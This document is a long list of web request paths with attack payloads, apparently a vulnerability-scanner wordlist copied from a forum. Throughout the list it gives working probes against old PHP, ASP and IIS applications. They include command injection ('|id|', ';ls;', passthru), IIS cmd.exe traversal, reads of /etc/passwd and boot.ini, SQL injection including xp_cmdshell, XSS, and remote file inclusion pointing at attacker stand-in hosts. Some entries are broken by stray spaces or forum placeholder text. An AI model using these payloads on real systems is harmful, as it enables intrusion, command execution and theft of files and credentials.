/phpping/index.php?pingto=www.somewhere.org%20|%20dir
/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/php-nuke/modules.php?name=Surveys&pollID=a'sql_inject
/php-nuke/admin.php?op=login&pwd=123&aid=Admin'sql_stuff
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/phpMyAdmin/tbl_copy.php?strCopyTableOK=".passthru('/bin/ls')."
/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name= test.haxor2&strCopyTableOK=".passt
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
/phpmyadmin/export.php?what=../../../../../../etc/hosts%00
/phpmyadmin/
/phplinks/index.php?show=ruaosleas
/phplinks/include/email_confirmation.php?UserName=x&Email= x@target&site_TiTle=test_&emai
/phpinfo.php3
/phpinfo.php
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/phpgedview/functions.php?PGV_BASE_DIRECTORY=another_host
/phpgedview/config_gedcom.php?PGV_BASE_DIRECTORY=another_host
/phpgedview/authentication_index.php?PGV_BASE_DIRECTORY=anothe r_host
/php-coolfile/action.php?action=edit&file=config.php
/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20w here%20username%3 D'hosch
/phpbb206c/admin/admin_words.php?mode=edit&id=1/*">**********alert(****************);
/phpBB2/viewtopic.php?sid=1&topic_id=-1&view=newest
/phpBB2/search.php?search_id=1\
/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=host_w ith_includes/functions_s
/phpBB/viewtopic.php?topic_id=xss_things
/phpBB/phpinfo.php
/phpBB/bb_memberlist.php?sortby=user_regdate
/phpbb/admin/admin_words.php?mode=edit&id=1/*">**********alert(****************);</sc
/phpbb/admin/admin_ug_auth.php
/php-affiliate/details2.php
/php_my_admin/
/php/phpinfo.php3
/php/phpinfo.php
/php/info.php3
/php/info.php
/php/index.php
/photorate/new.php
/photoalbum/admin/adminlogin.asp
/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99_union_stuff
/phorum/viewtopic.php?id=some_shit&t_id=2
/phorum/register.php
/phorum/download.php
/phorum/admin/actions/del.php?include_path=http://phonehomedotcom&cmd=ls
/pforum/edituser.php
/perl/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/perl/
/perl
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/pccsmysqladm/incs/dbconnect.inc
/PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/pbl/index.php
/pbcgi.cgi?name=tistname&email=
/payonline.asp
/patch/index.php
/passwords/
/password/
/password.txt
/password.inc
/password.db
/password.dat
/passcfg
/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1, 2,3)%20INTO%20OUTFILE%2 0'/tmp/file.t
/pass?loginpass=a&redirect=0%2F&Submit=Login
/pals-cgi?palsAction=restart&********Name=pals-cgi
/pages/
/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=`
/pafiledb/pafiledb.php
/pafiledb/includes/team/file.php?fileupl_possib
/ows-bin/perlidlc.bat?&dir
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/*.bat?&dir
/owl/browse.php?loginname=whocares&parent=1&expand=1&or der=creatorid&sortposted=ASC
/outgoing/
/out.php?id=any_word
/orders/orders.txt
/orders/mountain.cfg
/orders/
/order/
/oracle/
/opt/setupt/
/opt/
/oprocmgr-status
/oprocmgr-service
/OpenFile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cB OOT.INI
/opendir.php?requesturl=/etc/hosts
/openbb/board.php?
/op/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/oldfiles/
/old/
/oetaki/oetaki.cgi
/oetaki/oekakibbs.conf
/odbc/
/odbc.inc
/ocp-103/index.php?req_path=another_host_with_funcs_dot_php
/objcheck.asp
/nx/common/cds/menu.inc.php?c_path=otherhost_with__common_lib_lau nch.inc.php
/Nwind/Template/catalog.xml?contenttype=text/overvlowhere
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/nul..dbm
/nuke73/modules.php?name=Calendar&file=index&type=view&eid =-99%20UNION%20ALL%20SELECT%20
/nuke71/admin.php?op=NukebookEditEntry&nbid=-2%20UNION%20SELECT%20null%20/*
/nuke70/modules/MS_Analysis/TiTle.php
/nuke70/modules/MS_Analysis/mstrack.php
/ntsync4.ntf
/ntsync4.nsf
/nsn/env.bas
/nphp/nphpd.php?nphp_config[LangFile]=/etc/hosts
/NotifyAction.asp?action=AddType&instance=Beeper&en d=end
/node/view/666
/nfuse/asp/launch.asp
/newuser.asp
/newtopic.php?subpath=http://badurl_banniere.php
/newsletter.php?action=1&waroot=http://otherhost_start_php/
/news51/newsdata/data/user.idx
/news_view.asp?ID=sql_things
/news/p-news.php
/news/newsdata/data/user.idx
/news/news.mdb
/news/include/customize.php?l=http://host/otherfile.php
/News/article.php
/news.inc
/newfiles/
/new/
/networking_utils.php
/network_query.php?portNum=80&queryType=all&target= 127.0.0.1%3Bls+-l&Submit=Do+It
/netutils/nettools.php
/nettools.php
/netget?sid=user&msg=300&file=/../../../filename.ext
/names.nsf/Open
/names.nsf
/mysql.class
/myguestBk/admin/index.asp
/myguestBk/admin/delEnt.asp?id=avalidnewsnumber
/MWS/HandleSearch.html?searchTarget=morethan990bytesove rflow
/mwadmin/index.php?real_Cookie_is_auth=1;_uId=1
/msql/
/msadc/samples/adctest.exe
/msadc/samples/adctest.asp
/msadc/msadcs.dll
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
/moregroupware/modules/webmail2/index.php
/moregroupware/modules/webmail2/inc/
/moregroupware/modules/contact/index.php
/moregroupware/modules/
/more.php?id='sql_things
/modules/WebMail/mailattach.php?userfile=../../some.php&userfile_name=../attachments/file
/modules/WebMail/mailattach.php?userfile_name=../../AvantGo/language/file.php
/modules/WebMail/mailattach.php
/modules/WebChat/index.php
/modules/mylinks/brokenlink.php
/modules/mydownloads/viewcat.php
/modules/mod_mainmenu.php
/modules/glossaire/glossaire-aff.php
/modules/forum/src/Profile.php
/modules/dictionary/search.php?terme=">**********alert(1)</script>
/modules.php?set_albumName=album01&id=aaw&op=modloa d&name=gallery&file=index&include=../
/modules.php?op=modload&name=Web_Links&file=index&l _op=viewlink&cid=2%23sql_injection
/modules.php?op=modload&name=Forums&file=viewtopic& topic=1&forum=1'sql
/modules.php?op=modload&name=Forums&file=viewforum& forum='%20OR%201=1;--
/modules.php?op=modload&name=Forums&file=reply&foru m=1');--
/modules.php?op=modload&name=Forums&file=newtopic&f orum=1');--
/modules.php?op=modload&name=Forums&file=editpost&f orum=1';--
/modules.php?op=modload&name=Forums&file=attachment &AtchOp=show
/modules.php?name=Your_Account&op=userinfo&uname=
/modules.php?name=Surveys&pollID=a'sql_inject
/modules.php?name=News&file=article&sid=1234%20or%2 01=1
/modules.php?name=Members_List&letter='%20OR%20user _level='4'/*
/modules.php?name=Members_List&&sql_debug=1
/modules.php?name=Downloads&d_op=viewdownload&cid=5 9%20or%20cid=2
/modules.php?name=AvantGo&file=print&sid=textgoeshe rexxx
/module.php?link=http://anotherhost_file_extension
/modsecurity.php?inc_prefix=obox/htmlheader.php
/modif/ident.php?id=validmemberidnumeric&pass='%20OR%20'' ='
/modeles/haut.php?dirroot=http://badhost_with_lang_lang.php&SESSION= .
/mmstdol.pl
/mmstdol.cgi
/mmstdod.pl
/mmstdod.cgi
/minivend/catalog.cfg
/messageboard/Forum.asp?QuestionNumber='+sql_stuff&Find=1&Catego ry=1
/merchants/admin.pw
/members.asp?mode=search&M_NAME=A&initial=1&method=
/megabook/files/20/setup.db
/megabook/admin.cgi?default_pass_is_megabook
/marketing/
/manual/
/manual.php
/mantis/view_all_bug_page.php
/mantis/login_page.php?g_****_include_file=every_file
/mantis/core/bug_api.php?t_core_dir=_another_host_with_relation ship_api.php
/manpage/index.php?command=/etc/resolv.conf
/manage/login.asp?User=admin&Pass='+or+'1'='1
/manage/cgi/cgiproc?Nocfile=
/mambo/banners.php?op=click&bid=100%2f*+
/mambo/administrator
/mall_log_files/order.log
/mall_log_files/
/main/cafenews.php
/main.cgi?next_file=/etc/hosts
/main.cgi?next_file=/etc/hosts
/main.asp+.htr
/mailw46.ntf
/mailw46.nsf
/mails/message.mdb
/mailman/edithtml
/mailbox.ntf
/mailbox.nsf
/mailattach.php?submit=1&attach1=admin/original/config.php&attach1_name=../DBInfos.txt
/mail?
/mail/vpopmail.php
/mail/src/search.php
/mail/src/read_bOdy.php
/mail/src/compose.php?mailbox="script_stuff
/mail/message.mdb
/mail/m602cl3w.exe?A=GetFile&U=9&DL=0&FN=../../../boot.ini
/mail/admin/../settings.html.
/mail/admin/../include.html.
/mail/admin
/mail/
/mab.nsf
/ls|
/logs/WS_FTP.LOG
/logs/webstar.log
/login/?user=_cmd_with_pipes_and_backticks
/login/
/logicworks/logicworks.ini
/logicworks.ini
/logfiles/
/logbook.pl?file=cmdpipe
/log/WS_FTP.LOG
/log/
/log.nsf
/livredor/index.php?XSS
/list
/library/lib.php
/library/editor/editor.php?root=myhost_library__editor__PropAcce_s tring.php
/library/
/lib/
/level/99/exec/show/config
/level/15/exec/show/config
/level/1/exec/show/config
/level/0/exec/show/config
/ldap/cgi-bin/ldacgi.exe?Action=**********alert(88</script>
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+http
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.nc
/lcgi/lcgitest.nlm
/kernel/classes/ezsearchlog.php
/kernel/classes/ezsearch.php
/kernel/classes/ezrole.php
/k/home?dir=/&file=../../../../../../../../etc/hosts&lang=en
/jta20.jar
/jsptest.jsp+
/jsptest.jsp\
/jsp_test/PoolMan.jsp
/jsp/view_source.jsp
/jsp/upload.jsp
/jsp/source.jsp
/jongeren/Gastenboek/sign.asp
/join.cfm
/jgb_eng_php3/jgb.php3
/jgb_eng_php3/cfooter.php3
/jdbc/
/jave/
/java/
/jaf/index.php?show=../../../../../../../etc/hosts
/isqlplus?action=logon&username=xssthings&password= xssthings
/isapi/tstisapi.dll
/isapi/count.pl
/ipchat.php?root_path=anotherhost_with_conf_global. php
/ipb/ssi.php?a=out&type=xml&f=0)
/intranet/browse.php?loginname=whocares&parent=1&expand=1&or der=creatorid&sortposted=ASC
/intranet/
/intra/
/interscan/cgi-bin/FtpSave.dll?yes
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?I'm%20here
/internal/
/internal.sws?../../windows/system.ini
/install-files/
/installfiles/
/install/
/install.php?phpbb_root_dir=myservertataa
/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select% 20userid%20from%20users)
/ingenium/config/config.txt
/info/
/info.php3
/info.php
/info.dat
/indilist.php?alpha=\&surname_sublist=\
/index.search
/index.php3?vhosts=http://go.to
/index.php3.%5c../..%5cconf/httpd.conf
/index.php3%20%20
/index.php?topic=te'st/sqlinject
/index.php?subpath= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/index.php?pymembs=admin
/index.php?file=http://xxx&fcmd=ls
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2F etc
/index.php%20%20
/index.jsp::$DATA
/index.jsp../
/index.jsp..
/index.JSP
/index.js%70
/index.JHTML
/index%2ejsp
/incoming/
/includes/hotnews-engine.inc.php3?config[header]=host_file_etc
/includes/hotnews-engine.inc.php?config[header]=host_file_etc
/includes/hnmain.inc.php3?config[incdir]=anotherhost_with_func.inc.php3
/includes/hnmain.inc.php3?config[incdir]=another_host_withhndefs.inc.php3
/includes/header.php3?my_header=xyz
/includes/global.inc
/includes/functions/pmwh.php
/includes/footer.php3?my_footer=yxz
/includes/config.php3
/includes/config.php
/includes/config.inc
/includes/Cache/Lite/Function.php?mosConfig_absolute_path=other_host_
/includes/add.php
/includes/
/include/test.php
/include/sql.php
/include/sql.inc
/include/postgres65.php?inc_dir= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/include/options_form.php
/include/oci8.php?inc_dir=http://www.atker.com&ext=txt
/include/news.inc
/include/mysql.php?inc_dir=http://www.atker.com&ext=txt
/include/mssql7.php?inc_dir= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/include/msql.php?inc_dir=http://www.atker.com&ext=txt
/include/livre_include.php
/include/help.php?base=anotherserver_with_include_common.in c
/include/functions.inc
/include/default_header.php
/include/dbconfig.inc
/include/db.inc
/include/database.inc
/include/data.inc
/include/config.inc.php?lvc_include_dir=server_with__slash_ db_slashdb_mysql.inc.php
/include/config.inc
/include/
/include.php?path= contact.php&contact_email=">xss_things
/inc/test.php
/inc/sql.inc
/inc/sendmail.inc
/inc/odbc.inc
/inc/news.inc
/inc/functions.inc
/inc/dbase.php?prefix=myhost
/inc/db.inc
/inc/database.inc
/inc/data.inc
/inc/config.php?prefix=myhost
/inc/common.load.php?prefix=myhost
/inc/
/in.php?id=any_word
/import/
/imp/mailbox.php3?actionID=6&server=x&imapuser=x';sqlth ings
/imp/compose.php
/img_upload/
/img_upl/
/imageview.php?zoomval=blah
/imageview.php?filename=/
/images_upload/
/images_upl/
/images/tmp.txt
/images/?pattern=/*&sort=name
/iissamples/sdk/asp/interaction/ServerVariables_VBScript.asp
/iissamples/sdk/asp/interaction/ServerVariables_JScript.asp
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iissamples/sdk/asp/
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiH iliteType=Fu
/iissamples/exair/search/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/HowItWorks/CodeBrws.asp
/iissamples/
/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_Seco ndTab=All&GroupName=
/iishelp/iis/misc/iirturnh.htw
/iisadmpwd/anot3.htr
/iisadmpwd/anot.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp.htr
/iisadmpwd/achg.htr
/iisadmpwd/_AuthChangeUrl
/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/iisadmpwd/
/iisadmin/ism.dll%3fhttp/dir
/ifx/?LO=../../../../../../../../../etc/hosts
/ideas/
/ideabox/include.php?gorumDir=anotherhost_with_notification .php
/idea/
/ibill/
/hypermail
/https-admserv/config/admpw
/https-admserv/bin/perl/importInfo?dir=/tmp
/http-commander/OpenFile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cB OOT.INI
/http-commander/http.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBOOT. INI
/http-commander/getfile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBO OT.INI
/http.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBOOT. INI
/htmltonuke.php?filnavn=xssthings%20example.html
/html/partner.php?mainfile=anything&Default_Theme=xss_sc ript
/html/jsp/fnd/aoljtest.jsp
/html/chatheader.php?mainfile=anything&Default_Theme=xss _script
/html/affich.php?base=_some_server_with_sp- turn.php
/html/
/htdocs/
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/host
/hp/device/this.LCDispatcher
/hostingcontroller
/horde/turba/status.php
/horde/imp/mailbox.php?mailbox=/etc/hosts
/horde/imp/login.php?1=1&imapuser=xss_script
/homepage.nsf
/homebet/homebet.log
/homebet/homebet.dll?form=menu&option=menu-signin
/home/
/hit.php?url_hit=anotherhost_with_config.php
/help.php?file=xss_thing
/hd/winnt/system32/cmd.exe?/c+echo+hello
/guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
/guests/
/guestbook/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/guestbook/sign.asp
/guestbook/pwd
/guestbook/passwd.txt
/guestbook/passwd.db
/guestbook/passwd.dat
/guestbook/passwd
/guestbook/new_entry.asp
/guestbook/insert.inc.php?path=another_host_with_data.inc.php
/guestbook/guestbookdat
/guestbook/gbadmin.cgi?action=setup
/guestbook/gb_eintragen.asp
/guestbook/files/passwd.txt
/guestbook/dcguest.cgi
/guestbook/database/mpcsoftweb_guestdata.mdb
/guestbook/AWSguest.php
/guestbook/admin/o12guest.mdb
/guestbook/admin.php
/guestbook/admin.php
/guestbook/
/guest/insert.inc.php?path=another_host_with_data.inc.php
/guest/gbadmin.cgi?action=setup
/guest/database/mpcsoftweb_guestdata.mdb
/guest/AWSguest.php
/graphs.php?action=edit&vertical_label=$(/bin/ls)
/godllink/admin/admin.php
/go.cgi?artarchive=|id|
/go.cgi?|id|
/globals.pl
/globals.php3?LangCookie=minetataa
/Globals.jsa
/global.inc
/global.cnf
/global.asax.cs
/global.asax
/global.asa+.htr
/global.asa\
/global.asa::$DATA
/global.asa%3f.jsp
/global.asa%3f.htr
/global.asa%20.pl
/global.asa
/getfile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBO OT.INI
/gemitel/html/affich.php?base=_some_server_with_sp-turn.php
/gdbi.php?action=connect&username=Blah
/gbook/insert.inc.php?path=another_host_with_data.inc.php
/gbook/gbadmin.cgi?action=setup
/gb_eintragen.asp
/gb/index.php?login=true
/gb/gb_eintragen.asp
/gb.asp
/gallery/setup/index.php?GALLERY_BASEDIR=another_host_with_util.p hp
/gallery/init.php?HTTP_POST_VARS=xxx&GALLERY_BASEDIR=somedi r
/gallery/displayCategory.php?basepath=http://anotherhost_with_imageFunctions.php
/gallery/displayCategory.php?adminpath= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/gallery/data/adminusers.csv
/gal/data/adminusers.csv
/gaestebuch/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/gaestebuch/new_entry.asp
/gaestebuch/insert.inc.php?path=another_host_with_data.inc.php
/gaestebuch/gb_eintragen.asp
/gaestebuch/files/passwd.txt
/function_foot_1.inc.php
/ftpfiles/
/ftp/
/frontend/x/sql/repairdb.html?db=**********alert('Vulnerable')</script>
/frontend/x/ftp/doaddftp.html?login=">**********alert('Vulnerable' )</script>
/frontend/x/cpanelpro/showlog.html?account=**********alert('Vulnerable') </script>
/frontend/x/cpanelpro/ignorelist.html?account=">**********alert('Vulnera ble')</script>
/fpadmin/
/forums/ssi.php
/forums/sources/functions.php?skinid=huhh
/forums/sm_install.php
/forums/list.php
/forums/forumdisplay.php?s=&forumid=
/forums/download_forum.php
/forums/ avatar.php?img=../secret/connect.php
/forum51/forumdata/data/user.idx
/forum/viewtopic.php?forum=1&showtopic=1'0/sqlinject
/forum/ssi.php
/forum/sources/functions.php?skinid=huhh
/forum/sm_install.php
/forum/register_new_user.asp?ForumID=0
/forum/register.asp??mode=DoIt&Email='%20exec%20master..x p_cmdshell%20'dir'%20--&Name=sn
/forum/private.php
/forum/pm_buddy_list.asp?name=A&desc=xss_things="&code=1
/forum/memberlist.php
/forum/mainfile.php?MAIN_PATH=anotherhost_with_config.php
/forum/index.php?act=Search&nav=lv&CODE=show&searchid=val id_session_id&search_in=topics&
/forum/include/default_header.php?script_path=http://host_with_-include-default_style.css
/forum/include.php?gorumDir=anotherhost_with_group.php
/forum/forumdisplay.php?s=&forumid=
/forum/forumdata/data/user.idx
/forum/download_forum.php
/forum/database/philboard.mdb
/forum/admin/wwforum.mdb
/forum/action.php?action=activation&userid=346&code=35626 8007
/forum/
/foldoc/template.cgi?template.cgi
/Folderactions.asp
/fndwrr.exe
/fndwrr
/fm.php
/files/pwd.txt
/files/pwd.db
/files/pwd.dat
/files/pwd
/files/passwd.txt
/files/passwd.db
/files/passwd.dat
/files/passwd
/files/
/filemgmt/visit.php?lid=1'1'0/sqlinject
/filemgmt/viewcat.php?cid='6/sqlinject
/filemgmt/singlefile.php?lid=17'/0/sqlinject
/filemgmt/brokenfile.php?lid=17'/"%3sqlinject
/filemanager/source.php?../../../../etc/hosts
/filemanager/index.php3?action=telecharger&fichier=/etc/hosts
/filemanager/index.php?action=telecharger&fichier=/etc/hosts
/fileCopy.asp?INPUTFILE=&OUTPUTFILE=
/File_editor.asp
/file/main.shtml
/file/main.jsp
/file/main.jhtml
/file/index.shtml
/file/index.jsp
/file/index.jhtml
/file/
/fcgi-bin/php.ini
/fcgi-bin/echo2
/fcgi-bin/echo
/faqman/index.php?op=view&t=518">xssthins
/famlist.php?alpha=(&surname_sublist=yes&surname=\
/ezhttpbench.php?AnalyseSite=/etc/hosts&NumLoops=1
/ezboard/ezman.cgi
/ezboard/ezboard.cgi
/ezboard/ezadmin.cgi
/ez2000/ezman.cgi
/ez2000/ezboard.cgi
/ez2000/ezadmin.cgi
/extras/quicklist.php?bn=krasl
/ext.ini.%00.txt
/ext.dll?mfcisapicommand=loadpage&page=admin.ats&a0 =add&a1=root&a2=%5C
/ext.dll?MfcIsapiCommand=LoadPage&page= admin.hts%20&a0=add&a1=root&a2=%5C
/ext.dll%00
/ext.dll
/express/cache/
/exec/MsmSetup.exe?tst
/exe/
/exchange/root.asp?acs=anon
/examples/servlet/SnoopServlet
/examples/jsp/view_source.jsp
/examples/jsp/source.jsp
/examples/jsp/snp/anything.snp
/examples/applications/bboard/bboard_frames.html
/example.jsp../
/example.jsp..
/example.jsp%81
/example%2ejsp
/evoweb/?EvoCmd=console
/evo/web/?EvoCmd=console
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmai
/eventscroller.php?path_simpnews=anotherwith_config .php
/events4.nsf
/eventcal2.php.php?path_simpnews=anotherhostwith_co nfig.php
/etc/****dot.conf
/eshop/20Review.asp?ProductCode='
/eshop/10Expand.asp?ProductCode='
/error/HTTP_NOT_FOUND.html.var
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/enteteacceuil.php?subpath=http://badurl_banniere.php
/entete.php?subpath=http://badurl_banniere.php
/endon/mod.php?mod=publisher&op=viewcat&cid=<b>test</b%3
/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|ls|
/emumail.cgi?type=fh%00
/employees/
/emml_email_func.php?emml_path=http://somehost_with_class.html.mime.mail.php
/elitenews/stats.php
/elitenews/login.html
/E-Guest_sign.pl
/eg/source.asp
/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc%2 fhosts
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/dynamic/
/dyn/
/downloads/
/download/
/download.php?filename=../../../../../../../../../../../../etc/hosts
/down/
/dostuff.php?action=modify_user
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
/domlog.nsf
/domcfg.nsf/viewname%3fSearchView&Query="*"
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/%3fopen
/dodo/cgi-bin/update_profile.cgi
/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
/docs/NED?action=retrieve&********=http://www.nokia.com
/docs/
/docmgmtout.php
/docman/new.php
/doc-html/
/doc/packages/
/doc/
/do_subscribe?showuser=BOFx?
/do_map?action=new&oldalias=eso&alias=**********ale rt(****************);</script>&folder
/dnstools.php?section=security&user_logged_in=true& user_dnstools_administrator=YES
/dnstools.php?section=hosts&user_logged_in=true
/dms0
/dms/DMSDump
/dms/AggreSpy
/DMR/
/dm/demarc
/disk_c
/discuss/passwd.txt
/directory/gotopage.cgi?13686+/../../../../../../etc/hosts
/directory/genindexpage.cgi?13687+Home+/../../../../../../etc/hosts
/directory/functions.php?clang=../../../../../../../../../../../../etc/hosts
/directory.php?dir=%3Bmore%20/etc/passwd
/dev60cgi/rwcgi60?test&report=
/dev60cgi/rwcgi60.sh?test&report=
/dev60cgi/rwcgi60.exe?test&report=
/dev60cgi/rwcgi60.cgi?test&report=
/details2.php
/details.asp
/deskpro_v1/view.php?ticketid=1'&ticket_pass=
/deskpro_v1/faq.php?cat=45'
/demos?sql=select+*+from+Customers+as+Customer+FOR+ XML+auto&root=root&xsl= custtable.xsl
/demonstration/
/demo/email/sendmail.jsp
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/demo/
/deletecontact.php?item_id=100+OR+TRUE+;
/defines.php?WEBCHATPATH=anothersrvr_language_engli sh.php
/default.php3%20%20
/default.php%20%20
/default.conf
/default.asp+.htr
/default.asp%3f.htr
/decsadm.nsf
/debug/showproc?proc=**********alert('hello');</script>
/debug/errorInfo?TiTle=**********alert('hello');</script>
/debug/echo?name=**********alert('hello');</script>
/debug/dbg?host=**********alert('hello');</script>
/debug.txt
/debug.log
/dcp/lostpassword.php?action=lost&email=xaw@slsdd332sxl sfaked.com
/dcp/advertiser.php?adv_logged=1&username=1&password=qw e'sqlthings
/dbg.txt
/dbg.log
/dbconfig.inc
/dbase/
/dbaccess.txt :
/dba.inc
/db2_doc/html/db2srsen.exe
/db/users.dat
/db/message.mdb
/db/info.php
/db/
/db.inc
/dateiverwaltung.php
/dateiupload.php
/database/philboard.mdb
/database/db2000.mdb
/database/****cart.mdb
/database/
/database.nsf?Edit********
/Data/settings.xml
/data/root.pref
/data/default_pref
/data/adminusers.csv
/data/administrator.pref
/data/admin.pref
/data/
/data.inc
/dat/
/dansguardian/edit.cgi?file=xxx
/cutenews/shownews.php?cutepath=anotherhost_with_config.php_ or_news.txt
/cutenews/search.php?cutepath=anotherhost_with_config.php_or _news.txt
/cutenews/comments.php?cutepath=anotherhost_with_config.php_ or_news.txt
/customers/
/current/modules.php?mod=fm&file=../../../../../../../../../../etc/hosts%00&bn=fm_d1
/current/index.php?site=demos&bn=../../../../../../../../../../etc/hosts%00
/csSearch.cgi?command=savesetup&setup=`/bin/ls`
/CSNews.cgi
/crm/download.php?filename=../../../../../../../../../../../../etc/hosts
/credit/
/cphp/index.php?op=invparam_and_index_dot_php_op_include s_any_file
/cpcommerce/_functions.php?prefix=anotherhost_and_index_with_i ndex_gateways.php
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=a dd&Language=english&Submit=Con
/counter/
/copyFile.asp
/convert-date.php?cal_dir=anotherhost_with_vars.inc_or_pref s.inc
/content/base/build/explorer/none.php?/etc/
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_i d<1000
/contacts.php?cal_dir=anotherhost_with_vars.inc_or_ prefs.inc
/ConsoleHelp/
/console/
/config/config.txt
/config/
/config.inc
/compte.php?achat=1&valider=1&identifiant='%20OR%20 ''='&password='%20OR%20''='
/compose.php
/components/AspUpload/Samples/UploadScript11.asp
/components/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/DirectoryListing.asp
/comment.php?type=filemgmt&cid=filemgmt-1'70/sqlinject
/comment.php?mode=display&sid=foo&pid=;--injecthere&TiTle=hoschi
/comment.php?mode=display&sid=filemgmt-XXX&TiTle=sqlinject
/collect4.ntf
/collect4.nsf
/cocoon/view-source
/cocoon/status
/cocoon/samples/welcome
/cocoon/
/cmsx/upload.php
/cmsx/
/cms-uploads/
/cmsuploads/
/cmsupload/
/cms-up/
/cmsup/
/cms/typo3conf/ext/
/cms/typo3/install/
/cms/typo3/
/cms/fileadmin/log.txt
/cms/fileadmin/
/cms/adm_pages.php?and_/index.php_qm_inc=anotherhost_with_dot_php
/cms/
/cloisterblog/journal.pl?syear=2004&sday=11&smonth=../../../../../../../../etc/passwd%00
/clippings.php?action=add&id=Blah
/cleartrust/ct_logon.asp?CTLoginErrorMsg=XSS
/class/mysql.class
/citrix/****framexp/default/login.asp?NFuse_LogoutId=On&NFuse_MessageType=Erro r&NFuse_Me
/ChipCfg.cfg
/ChipCfg
/chip.ini
/chgpwd.php?USERNAME=existing_user&PASSWORD='%20OR% 20''='
